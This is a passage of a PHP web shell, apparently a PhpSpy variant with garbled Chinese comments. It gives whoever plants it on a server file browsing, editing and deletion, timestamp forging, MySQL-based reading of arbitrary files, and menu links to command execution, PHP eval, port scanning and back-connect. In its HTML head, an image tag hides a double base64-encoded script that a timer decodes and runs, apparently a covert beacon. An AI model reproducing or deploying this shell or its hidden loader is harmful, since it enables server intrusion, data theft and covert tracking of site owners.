130// ͨ¹ýMYSQLÏÂÔØÎļþ
131if($doing=='mysqldown'){
132 if (!$dbname) {
133 $errmsg = 'Please input dbname';
134 } else {
135 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
136 if (!file_exists($mysqldlfile)) {
137 $errmsg = 'The file you want Downloadable was nonexistent';
138 } else {
139 $result = q("select load_file('$mysqldlfile');");
140 if(!$result){
141 q("DROP TABLE IF EXISTS tmp_angel;");
142 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
143 //ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
144 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
145 $result = q("select content from tmp_angel");
146 q("DROP TABLE tmp_angel");
147 }
148 $row = @mysql_fetch_array($result);
149 if (!$row) {
150 $errmsg = 'Load file failed '.mysql_error();
151 } else {
152 $fileinfo = pathinfo($mysqldlfile);
153 header('Content-type: application/x-'.$fileinfo['extension']);
154 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
155 header("Accept-Length: ".strlen($row[0]));
156 echo $row[0];
157 exit;
158 }
159 }
160 }
161}
162
163?>
164<html>
165<head>
166<meta http-equiv="Content-Type" content="text/html; charset=gbk">
167<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
168<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
169<style type="text/css">
170body,td{font: 12px Arial,Tahoma;line-height: 16px;}
171.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
172.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
173.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
174a {color: #00f;text-decoration:underline;}
175a:hover{color: #f00;text-decoration:none;}
176.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
177.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
178.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
179.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
180.head td span{font-weight:normal;}
181.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
182form{margin:0;padding:0;}
183h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
184ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
185u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
186.drives{padding:5px;}
187.drives span {margin:auto 7px;}
188</style>
189<script type="text/javascript">
190if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
191setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(5);}, 500);
192</script>
193<script type="text/javascript">
194function CheckAll(form) {
195 for(var i=0;i<form.elements.length;i++) {
196 var e = form.elements[i];
197 if (e.name != 'chkall')
198 e.checked = form.chkall.checked;
199 }
200}
201function $(id) {
202 return document.getElementById(id);
203}
204function createdir(){
205 var newdirname;
206 newdirname = prompt('Please input the directory name:', '');
207 if (!newdirname) return;
208 $('createdir').newdirname.value=newdirname;
209 $('createdir').submit();
210}
211function fileperm(pfile){
212 var newperm;
213 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
214 if (!newperm) return;
215 $('fileperm').newperm.value=newperm;
216 $('fileperm').pfile.value=pfile;
217 $('fileperm').submit();
218}
219function copyfile(sname){
220 var tofile;
221 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
222 if (!tofile) return;
223 $('copyfile').tofile.value=tofile;
224 $('copyfile').sname.value=sname;
225 $('copyfile').submit();
226}
227function rename(oldname){
228 var newfilename;
229 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
230 if (!newfilename) return;
231 $('rename').newfilename.value=newfilename;
232 $('rename').oldname.value=oldname;
233 $('rename').submit();
234}
235function dofile(doing,thefile,m){
236 if (m && !confirm(m)) {
237 return;
238 }
239 $('filelist').doing.value=doing;
240 if (thefile){
241 $('filelist').thefile.value=thefile;
242 }
243 $('filelist').submit();
244}
245function createfile(nowpath){
246 var filename;
247 filename = prompt('Please input the file name:', '');
248 if (!filename) return;
249 opfile('editfile',nowpath + filename,nowpath);
250}
251function opfile(action,opfile,dir){
252 $('fileopform').action.value=action;
253 $('fileopform').opfile.value=opfile;
254 $('fileopform').dir.value=dir;
255 $('fileopform').submit();
256}
257function godir(dir,view_writable){
258 if (view_writable) {
259 $('godir').view_writable.value=view_writable;
260 }
261 $('godir').dir.value=dir;
262 $('godir').submit();
263}
264function getsize(getdir,dir){
265 $('getsize').getdir.value=getdir;
266 $('getsize').dir.value=dir;
267 $('getsize').submit();
268}
269function editrecord(action, base64, tablename){
270 if (action == 'del') {
271 if (!confirm('Is or isn\'t deletion record?')) return;
272 }
273 $('recordlist').doing.value=action;
274 $('recordlist').base64.value=base64;
275 $('recordlist').tablename.value=tablename;
276 $('recordlist').submit();
277}
278function moddbname(dbname) {
279 if(!dbname) return;
280 $('setdbname').dbname.value=dbname;
281 $('setdbname').submit();
282}
283function settable(tablename,doing,page) {
284 if(!tablename) return;
285 if (doing) {
286 $('settable').doing.value=doing;
287 }
288 if (page) {
289 $('settable').page.value=page;
290 }
291 $('settable').tablename.value=tablename;
292 $('settable').submit();
293}
294function s(action,nowpath,p1,p2,p3,p4,p5) {
295 if(action) $('opform').action.value=action;
296 if(nowpath) $('opform').nowpath.value=nowpath;
297 if(p1) $('opform').p1.value=p1;
298 if(p2) $('opform').p2.value=p2;
299 if(p3) $('opform').p3.value=p3;
300 if(p4) $('opform').p4.value=p4;
301 if(p5) $('opform').p4.value=p5;
302}
303function g(action,nowpath,p1,p2,p3,p4,p5) {
304 if(!action) return;
305 s(action,nowpath,p1,p2,p3,p4,p5);
306 $('opform').submit();
307}
308</script>
309</head>
310<body style="margin:0;table-layout:fixed; word-break:break-all">
311<?php
312formhead(array('name'=>'opform'));
313makehide('action', $action);
314makehide('nowpath', $nowpath);
315makehide('p1', $p1);
316makehide('p2', $p2);
317makehide('p3', $p3);
318makehide('p4', $p4);
319makehide('p5', $p5);
320formfoot();
321
322if(!function_exists('posix_getegid')) {
323 $user = @get_current_user();
324 $uid = @getmyuid();
325 $gid = @getmygid();
326 $group = "?";
327} else {
328 $uid = @posix_getpwuid(@posix_geteuid());
329 $gid = @posix_getgrgid(@posix_getegid());
330 $user = $uid['name'];
331 $uid = $uid['uid'];
332 $group = $gid['name'];
333 $gid = $gid['gid'];
334}
335
336?>
337<table width="100%" border="0" cellpadding="0" cellspacing="0">
338 <tr class="head">
339 <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
340 </tr>
341 <tr class="alt1">
342 <td>
343 <span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
344 <a href="javascript:g('logout');">Logout</a> |
345 <a href="javascript:g('file');">File Manager</a> |
346 <a href="javascript:g('mysqladmin');">MYSQL Manager</a> |
347 <a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> |
348 <a href="javascript:g('shell');">Execute Command</a> |
349 <a href="javascript:g('phpenv');">PHP Variable</a> |
350 <a href="javascript:g('portscan');">Port Scan</a> |
351 <a href="javascript:g('secinfo');">Security information</a> |
352 <a href="javascript:g('eval');">Eval PHP Code</a>
353 <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
354 </td>
355 </tr>
356</table>
357<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
358<?php
359$errmsg && m($errmsg);
360
361// »ñÈ¡µ±Ç°Â·¾¶
362if (!$dir) {
363 $dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
364}
365$nowpath = getPath(SA_ROOT, $dir);
366if (substr($dir, -1) != '/') {
367 $dir = $dir.'/';
368}
369
370if ($action == 'file') {
371
372 // Åж϶ÁдÇé¿ö
373 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
374
375 // ´´½¨Ä¿Â¼
376 if ($newdirname) {
377 $mkdirs = $nowpath.$newdirname;
378 if (file_exists($mkdirs)) {
379 m('Directory has already existed');
380 } else {
381 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
382 @chmod($mkdirs,0777);
383 }
384 }
385
386 // ÉÏ´«Îļþ
387 elseif ($doupfile) {
388 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
389 }
390
391 // ±à¼­Îļþ
392 elseif ($editfilename && $filecontent) {
393 $fp = @fopen($editfilename,'w');
394 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
395 @fclose($fp);
396 }
397
398 // ±à¼­ÎļþÊôÐÔ
399 elseif ($pfile && $newperm) {
400 if (!file_exists($pfile)) {
401 m('The original file does not exist');
402 } else {
403 $newperm = base_convert($newperm,8,10);
404 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
405 }
406 }
407
408 // ¸ÄÃû
409 elseif ($oldname && $newfilename) {
410 $nname = $nowpath.$newfilename;
411 if (file_exists($nname) || !file_exists($oldname)) {
412 m($nname.' has already existed or original file does not exist');
413 } else {
414 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
415 }
416 }
417
418 // ¸´ÖÆÎļþ
419 elseif ($sname && $tofile) {
420 if (file_exists($tofile) || !file_exists($sname)) {
421 m('The goal file has already existed or original file does not exist');
422 } else {
423 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
424 }
425 }
426
427 // ¿Ë¡ʱ¼ä
428 elseif ($curfile && $tarfile) {
429 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
430 m('The goal file has already existed or original file does not exist');
431 } else {
432 $time = @filemtime($tarfile);
433 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
434 }
435 }
436
437 // ×Ô¶¨Òåʱ¼ä
438 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
439 if (!@file_exists($curfile)) {
440 m(basename($curfile).' does not exist');
441 } else {
442 $time = strtotime("$year-$month-$day $hour:$minute:$second");
443 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
444 }
445 }
446
447 // ÅúÁ¿É¾³ýÎļþ
448 elseif($doing == 'delfiles') {
449 if ($dl) {
450 $dfiles='';
451 $succ = $fail = 0;
452 foreach ($dl as $filepath) {
453 if (is_dir($filepath)) {
454 if (@deltree($filepath)) {
455 $succ++;
456 } else {
457 $fail++;
458 }
459 } else {
460 if (@unlink($filepath)) {
461 $succ++;
462 } else {
463 $fail++;
464 }
465 }
466 }
467 m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
468 } else {
469 m('Please select folder/file(s)');
470 }
471 }
472
473 //²Ù×÷Íê±Ï
474 formhead(array('name'=>'createdir'));
475 makehide('newdirname');
476 makehide('dir',$nowpath);
477 formfoot();
478 formhead(array('name'=>'fileperm'));
479 makehide('newperm');
480 makehide('pfile');
481 makehide('dir',$nowpath);
482 formfoot();
483 formhead(array('name'=>'copyfile'));
484 makehide('sname');
485 makehide('tofile');
486 makehide('dir',$nowpath);
487 formfoot();
488 formhead(array('name'=>'rename'));
489 makehide('oldname');
490 makehide('newfilename');
491 makehide('dir',$nowpath);
492 formfoot();
493 formhead(array('name'=>'fileopform', 'target'=>'_blank'));
494 makehide('action');
495 makehide('opfile');
496 makehide('dir');
497 formfoot();
498 formhead(array('name'=>'getsize'));
499 makehide('getdir');
500 makehide('dir');
501 formfoot();
502
503 $free = @disk_free_space($nowpath);
504 !$free && $free = 0;
505 $all = @disk_total_space($nowpath);
506 !$all && $all = 0;
507 $used = $all-$free;
508 p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
509
510 $cwd_links = '';
511 $path = explode('/', $nowpath);
512 $n=count($path);
513 for($i=0;$i<$n-1;$i++) {
514 $cwd_links .= '<a href="javascript:godir(\'';
515 for($j=0;$j<=$i;$j++) {
516 $cwd_links .= $path[$j].'/';
517 }
518 $cwd_links .= '\');">'.$path[$i].'/</a>';
519 }
520
521?>
522<script type="text/javascript">
523document.onclick = shownav;
524function shownav(e){
525 var src = e?e.target:event.srcElement;
526 do{
527 if(src.id =="jumpto") {
528 $('inputnav').style.display = "";
529 $('pathnav').style.display = "none";
530 //hidenav();
531 return;
532 }
533 if(src.id =="inputnav") {
534 return;
535 }
536 src = src.parentNode;
537 }while(src.parentNode)
538
539 $('inputnav').style.display = "none";
540 $('pathnav').style.display = "";
541}
542</script>
543<div style="background:#eee;margin-bottom:10px;">
544 <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
545 <tr>
546 <td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
547 <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
548 </tr>
549 </table>
550 <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
551 <form action="" method="post" id="godir" name="godir">
552 <tr>
553 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
554 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
555 <td nowrap><input class="bt" value="GO" type="submit"></td>
556 </tr>
557 </form>
558 </table>
559<?php
560 if (IS_WIN && IS_COM) {
561 $obj = new COM('scripting.filesystemobject');
562 if ($obj && is_object($obj) && $obj->Drives) {
563 echo '<div class="drives">';
564 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
565 $comma = '';
566 foreach($obj->Drives as $drive) {
567 if ($drive->Path) {
568 p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
569 $comma = '<span>|</span>';
570 }
571 }
572 echo '</div>';
573 }
574 }
575?>
576</div>
577<?php
578 $findstr = $_POST['findstr'];
579 $re = $_POST['re'];
580 tbhead();
581 p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
582 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
583 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
584 p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
585 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
586 p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
587 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
588 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
589
590 p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
591
592 p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
593
594 //²é¿´ËùÓпÉдÎļþºÍĿ¼
595 $dirdata=array();
596 $filedata=array();
597
598 if ($view_writable == 'dir') {
599 $dirdata = GetWDirList($nowpath);
600 $filedata = array();
601 } elseif ($view_writable == 'file') {
602 $dirdata = array();
603 $filedata = GetWFileList($nowpath);
604 } elseif ($findstr) {
605 $dirdata = array();
606 $filedata = GetSFileList($nowpath, $findstr, $re);
607 } else {
608 // Ŀ¼Áбí
609 //scandir()ЧÂʸü¸ß
610 $dirs=@opendir($dir);
611 while ($file=@readdir($dirs)) {
612 $filepath=$nowpath.$file;
613 if(@is_dir($filepath)){
614 $dirdb['filename']=$file;
615 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
616 $dirdb['dirchmod']=getChmod($filepath);
617 $dirdb['dirperm']=getPerms($filepath);
618 $dirdb['fileowner']=getUser($filepath);
619 $dirdb['dirlink']=$nowpath;
620 $dirdb['server_link']=$filepath;
621 $dirdata[]=$dirdb;
622 } else {
623 $filedb['filename']=$file;
624 $filedb['size']=sizecount(@filesize($filepath));
625 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
626 $filedb['filechmod']=getChmod($filepath);
627 $filedb['fileperm']=getPerms($filepath);
628 $filedb['fileowner']=getUser($filepath);
629 $filedb['dirlink']=$nowpath;
630 $filedb['server_link']=$filepath;
631 $filedata[]=$filedb;
632 }
633 }// while
634 unset($dirdb);
635 unset($filedb);
636 @closedir($dirs);
637 }
638 @sort($dirdata);
639 @sort($filedata);
640 $dir_i = '0';
641
642 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
643 makehide('action','file');
644 makehide('thefile');
645 makehide('doing');
646 makehide('dir',$nowpath);
647
648 foreach($dirdata as $key => $dirdb){
649 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
650 if($getdir && $getdir == $dirdb['server_link']) {
651 $attachsize = dirsize($dirdb['server_link']);
652 $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
653 } else {
654 $attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
655 }
656 $thisbg = bg();
657 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
658 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
659 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
660 p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
661 p('<td nowrap>'.$attachsize.'</td>');
662 p('<td nowrap>');
663 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
664 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
665 p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
666 p('</tr>');
667 $dir_i++;
668 } else {
669 if($dirdb['filename']=='..') {
670 p('<tr class='.bg().'>');
671 p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
672 p('</tr>');
673 }
674 }
675 }
676
677 p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
678 $file_i = '0';
679
680 foreach($filedata as $key => $filedb){
681 if($filedb['filename']!='..' && $filedb['filename']!='.') {
682 $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
683 $thisbg = bg();
684 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
685 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
686 p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
687 p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
688 p('<td nowrap>'.$filedb['size'].'</td>');
689 p('<td nowrap>');
690 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
691 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
692 p('<td nowrap>');
693 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
694 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
695 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
696 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
697 p('</td></tr>');
698 $file_i++;
699 }
700 }
701 p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
702 p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
703 p('</form></table>');
704}// end dir
705
706elseif ($action == 'sqlfile') {
707 if($doing=="mysqlupload"){
708 $file = $_FILES['uploadfile'];
709 $filename = $file['tmp_name'];
710 if (file_exists($savepath)) {
711 m('The goal file has already existed');
712 } else {
713 if(!$filename) {
714 m('Please choose a file');
715 } else {
716 $fp=@fopen($filename,'r');
717 $contents=@fread($fp, filesize($filename));
718 @fclose($fp);
719 $contents = bin2hex($contents);
720 if(!$upname) $upname = $file['name'];
